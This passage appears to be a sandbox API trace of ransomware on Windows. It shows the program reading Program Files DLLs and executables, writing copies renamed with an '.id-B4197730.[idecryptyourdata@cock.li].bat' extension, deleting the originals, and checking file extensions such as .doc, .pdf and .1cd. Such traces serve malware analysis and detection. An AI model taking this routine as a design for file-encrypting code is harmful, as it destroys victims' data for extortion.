Explorer\\spray-roman.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\internet explorer\\spray-roman.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0184.898] GetLastError () returned 0x0 [0184.898] ReadFile (in: hFile=0x368, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x12800, lpOverlapped=0x0) returned 1 [0184.902] WriteFile (in: hFile=0x364, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0x12810, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0x12810, lpOverlapped=0x0) returned 1 [0184.904] ReadFile (in: hFile=0x368, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.904] WriteFile (in: hFile=0x364, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xf2, lpOverlapped=0x0) returned 1 [0184.904] SetEndOfFile (hFile=0x364) returned 1 [0184.904] CloseHandle (hObject=0x364) returned 1 [0184.904] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.904] SetEndOfFile (hFile=0x368) returned 1 [0184.906] CloseHandle (hObject=0x368) returned 1 [0184.906] SetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\spray-roman.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0184.906] DeleteFileW (lpFileName="C:\\Program Files\\Internet Explorer\\spray-roman.exe" (normalized: "c:\\program files\\internet explorer\\spray-roman.exe")) returned 1 [0184.908] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\spray-roman.exe") returned 50 [0184.908] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\spray-roman.exe") returned 50 [0184.908] lstrlenW (lpString=".doc") returned 4 [0184.908] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0184.908] lstrlenW (lpString=".docx") returned 5 [0184.908] lstrcmpiW (lpString1=".docx", lpString2="n.exe") returned -1 [0184.908] lstrlenW (lpString=".pdf") returned 4 [0184.908] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0184.909] lstrlenW (lpString=".xls") returned 4 [0184.909] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0184.909] lstrlenW (lpString=".xlsx") returned 5 [0184.909] lstrcmpiW (lpString1=".xlsx", lpString2="n.exe") returned -1 [0184.909] lstrlenW (lpString=".ppt") returned 4 [0184.909] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0184.909] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\spray-roman.exe") returned 50 [0184.909] lstrlenW (lpString=".zip") returned 4 [0184.909] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0184.909] lstrlenW (lpString=".rar") returned 4 [0184.909] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0184.909] lstrlenW (lpString=".bz2") returned 4 [0184.909] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0184.909] lstrlenW (lpString=".7z") returned 3 [0184.909] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0184.909] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\spray-roman.exe") returned 50 [0184.909] lstrlenW (lpString=".dbf") returned 4 [0184.909] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0184.909] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\spray-roman.exe") returned 50 [0184.909] lstrlenW (lpString=".1cd") returned 4 [0184.909] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0184.909] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\spray-roman.exe") returned 50 [0184.909] lstrlenW (lpString=".jpg") returned 4 [0184.909] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0184.909] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\spray-roman.exe") returned 50 [0184.909] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\spray-roman.exe") returned 50 [0184.909] lstrlenW (lpString=".doc") returned 4 [0184.909] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0184.909] lstrlenW (lpString=".docx") returned 5 [0184.909] lstrcmpiW (lpString1=".docx", lpString2="n.exe") returned -1 [0184.909] lstrlenW (lpString=".pdf") returned 4 [0184.910] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0184.910] lstrlenW (lpString=".xls") returned 4 [0184.910] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0184.910] lstrlenW (lpString=".xlsx") returned 5 [0184.910] lstrcmpiW (lpString1=".xlsx", lpString2="n.exe") returned -1 [0184.910] lstrlenW (lpString=".ppt") returned 4 [0184.910] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0184.910] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\spray-roman.exe") returned 50 [0184.910] lstrlenW (lpString=".zip") returned 4 [0184.910] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0184.910] lstrlenW (lpString=".rar") returned 4 [0184.910] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0184.910] lstrlenW (lpString=".bz2") returned 4 [0184.910] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0184.910] lstrlenW (lpString=".7z") returned 3 [0184.910] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0184.910] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\spray-roman.exe") returned 50 [0184.910] lstrlenW (lpString=".dbf") returned 4 [0184.910] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0184.910] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\spray-roman.exe") returned 50 [0184.910] lstrlenW (lpString=".1cd") returned 4 [0184.910] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0184.910] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\spray-roman.exe") returned 50 [0184.910] lstrlenW (lpString=".jpg") returned 4 [0184.911] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0184.911] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0184.911] lstrlenW (lpString="sqmapi.dll") returned 10 [0184.911] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\sqmapi.dll" (normalized: "c:\\program files\\internet explorer\\sqmapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0184.912] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=49688) returned 1 [0184.912] CloseHandle (hObject=0x368) returned 1 [0184.912] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\sqmapi.dll" (normalized: "c:\\program files\\internet explorer\\sqmapi.dll")) returned 0x20 [0184.912] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\sqmapi.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\internet explorer\\sqmapi.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.912] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\sqmapi.dll" (normalized: "c:\\program files\\internet explorer\\sqmapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.912] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\sqmapi.dll") returned 45 [0184.912] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\sqmapi.dll") returned 45 [0184.912] lstrlenW (lpString=".doc") returned 4 [0184.912] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0184.912] lstrlenW (lpString=".docx") returned 5 [0184.912] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0184.912] lstrlenW (lpString=".pdf") returned 4 [0184.913] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0184.913] lstrlenW (lpString=".xls") returned 4 [0184.913] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0184.913] lstrlenW (lpString=".xlsx") returned 5 [0184.913] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0184.913] lstrlenW (lpString=".ppt") returned 4 [0184.913] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0184.913] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\sqmapi.dll") returned 45 [0184.913] lstrlenW (lpString=".zip") returned 4 [0184.913] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0184.913] lstrlenW (lpString=".rar") returned 4 [0184.913] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0184.913] lstrlenW (lpString=".bz2") returned 4 [0184.913] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0184.913] lstrlenW (lpString=".7z") returned 3 [0184.913] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0184.913] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\sqmapi.dll") returned 45 [0184.913] lstrlenW (lpString=".dbf") returned 4 [0184.913] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0184.913] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\sqmapi.dll") returned 45 [0184.913] lstrlenW (lpString=".1cd") returned 4 [0184.913] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0184.913] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\sqmapi.dll") returned 45 [0184.913] lstrlenW (lpString=".jpg") returned 4 [0184.913] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0184.914] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\sqmapi.dll") returned 45 [0184.914] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\sqmapi.dll") returned 45 [0184.914] lstrlenW (lpString=".doc") returned 4 [0184.914] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0184.914] lstrlenW (lpString=".docx") returned 5 [0184.914] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0184.914] lstrlenW (lpString=".pdf") returned 4 [0184.914] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0184.914] lstrlenW (lpString=".xls") returned 4 [0184.914] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0184.914] lstrlenW (lpString=".xlsx") returned 5 [0184.914] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0184.914] lstrlenW (lpString=".ppt") returned 4 [0184.914] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0184.914] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\sqmapi.dll") returned 45 [0184.914] lstrlenW (lpString=".zip") returned 4 [0184.914] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0184.914] lstrlenW (lpString=".rar") returned 4 [0184.914] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0184.914] lstrlenW (lpString=".bz2") returned 4 [0184.914] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0184.914] lstrlenW (lpString=".7z") returned 3 [0184.914] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0184.914] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\sqmapi.dll") returned 45 [0184.914] lstrlenW (lpString=".dbf") returned 4 [0184.914] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0184.914] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\sqmapi.dll") returned 45 [0184.914] lstrlenW (lpString=".1cd") returned 4 [0184.914] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0184.914] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\sqmapi.dll") returned 45 [0184.915] lstrlenW (lpString=".jpg") returned 4 [0184.915] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0184.915] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0184.915] lstrlenW (lpString="awt.dll") returned 7 [0184.915] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\awt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0184.916] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=1516608) returned 1 [0184.916] CloseHandle (hObject=0x368) returned 1 [0184.916] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\awt.dll")) returned 0x20 [0184.916] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\awt.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.916] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\awt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0184.916] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.916] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.916] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\awt.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0184.917] GetLastError () returned 0x0 [0184.917] ReadFile (in: hFile=0x368, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0xffff0, lpOverlapped=0x0) returned 1 [0185.320] WriteFile (in: hFile=0x364, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xffff0, lpOverlapped=0x0) returned 1 [0185.505] ReadFile (in: hFile=0x368, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x72450, lpOverlapped=0x0) returned 1 [0185.521] WriteFile (in: hFile=0x364, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0x72460, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0x72460, lpOverlapped=0x0) returned 1 [0185.603] ReadFile (in: hFile=0x368, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0185.603] WriteFile (in: hFile=0x364, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xe2, lpOverlapped=0x0) returned 1 [0185.603] SetEndOfFile (hFile=0x364) returned 1 [0185.604] CloseHandle (hObject=0x364) returned 1 [0185.604] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.604] SetEndOfFile (hFile=0x368) returned 1 [0185.608] CloseHandle (hObject=0x368) returned 1 [0185.608] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0185.609] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\awt.dll")) returned 1 [0185.609] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll") returned 46 [0185.609] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll") returned 46 [0185.609] lstrlenW (lpString=".doc") returned 4 [0185.609] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0185.609] lstrlenW (lpString=".docx") returned 5 [0185.609] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0185.609] lstrlenW (lpString=".pdf") returned 4 [0185.609] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0185.609] lstrlenW (lpString=".xls") returned 4 [0185.609] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0185.609] lstrlenW (lpString=".xlsx") returned 5 [0185.609] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0185.609] lstrlenW (lpString=".ppt") returned 4 [0185.609] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0185.609] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll") returned 46 [0185.609] lstrlenW (lpString=".zip") returned 4 [0185.609] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0185.610] lstrlenW (lpString=".rar") returned 4 [0185.610] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0185.610] lstrlenW (lpString=".bz2") returned 4 [0185.610] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0185.610] lstrlenW (lpString=".7z") returned 3 [0185.610] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0185.610] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll") returned 46 [0185.610] lstrlenW (lpString=".dbf") returned 4 [0185.610] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0185.610] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll") returned 46 [0185.610] lstrlenW (lpString=".1cd") returned 4 [0185.610] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0185.610] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll") returned 46 [0185.610] lstrlenW (lpString=".jpg") returned 4 [0185.610] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0185.610] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll") returned 46 [0185.610] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll") returned 46 [0185.610] lstrlenW (lpString=".doc") returned 4 [0185.610] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0185.610] lstrlenW (lpString=".docx") returned 5 [0185.610] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0185.610] lstrlenW (lpString=".pdf") returned 4 [0185.610] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0185.610] lstrlenW (lpString=".xls") returned 4 [0185.610] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0185.610] lstrlenW (lpString=".xlsx") returned 5 [0185.610] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0185.610] lstrlenW (lpString=".ppt") returned 4 [0185.611] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0185.611] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll") returned 46 [0185.611] lstrlenW (lpString=".zip") returned 4 [0185.611] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0185.611] lstrlenW (lpString=".rar") returned 4 [0185.611] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0185.611] lstrlenW (lpString=".bz2") returned 4 [0185.611] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0185.611] lstrlenW (lpString=".7z") returned 3 [0185.611] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0185.611] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll") returned 46 [0185.611] lstrlenW (lpString=".dbf") returned 4 [0185.611] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0185.611] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll") returned 46 [0185.611] lstrlenW (lpString=".1cd") returned 4 [0185.611] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0185.611] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\awt.dll") returned 46 [0185.611] lstrlenW (lpString=".jpg") returned 4 [0185.611] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0185.611] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0185.611] lstrlenW (lpString="bci.dll") returned 7 [0185.611] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\bci.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0185.613] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=16960) returned 1 [0185.613] CloseHandle (hObject=0x368) returned 1 [0185.615] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\bci.dll")) returned 0x20 [0185.616] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\bci.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0185.616] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\bci.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0185.616] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.616] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.616] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\bci.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0185.617] GetLastError () returned 0x0 [0185.617] ReadFile (in: hFile=0x368, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x4240, lpOverlapped=0x0) returned 1 [0189.398] WriteFile (in: hFile=0x364, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0x4250, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0x4250, lpOverlapped=0x0) returned 1 [0189.400] ReadFile (in: hFile=0x368, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0189.400] WriteFile (in: hFile=0x364, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xe2, lpOverlapped=0x0) returned 1 [0189.400] SetEndOfFile (hFile=0x364) returned 1 [0189.400] CloseHandle (hObject=0x364) returned 1 [0189.400] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0189.400] SetEndOfFile (hFile=0x368) returned 1 [0189.401] CloseHandle (hObject=0x368) returned 1 [0189.401] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0189.533] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\bci.dll")) returned 1 [0189.533] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll") returned 46 [0189.533] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll") returned 46 [0189.533] lstrlenW (lpString=".doc") returned 4 [0189.533] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0189.533] lstrlenW (lpString=".docx") returned 5 [0189.533] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0189.533] lstrlenW (lpString=".pdf") returned 4 [0189.533] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0189.533] lstrlenW (lpString=".xls") returned 4 [0189.533] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0189.533] lstrlenW (lpString=".xlsx") returned 5 [0189.533] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0189.533] lstrlenW (lpString=".ppt") returned 4 [0189.533] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0189.533] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll") returned 46 [0189.533] lstrlenW (lpString=".zip") returned 4 [0189.533] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0189.533] lstrlenW (lpString=".rar") returned 4 [0189.534] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0189.534] lstrlenW (lpString=".bz2") returned 4 [0189.534] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0189.534] lstrlenW (lpString=".7z") returned 3 [0189.534] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0189.534] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll") returned 46 [0189.534] lstrlenW (lpString=".dbf") returned 4 [0189.534] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0189.534] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll") returned 46 [0189.534] lstrlenW (lpString=".1cd") returned 4 [0189.534] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0189.534] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll") returned 46 [0189.534] lstrlenW (lpString=".jpg") returned 4 [0189.534] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0189.534] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll") returned 46 [0189.534] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll") returned 46 [0189.534] lstrlenW (lpString=".doc") returned 4 [0189.534] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0189.534] lstrlenW (lpString=".docx") returned 5 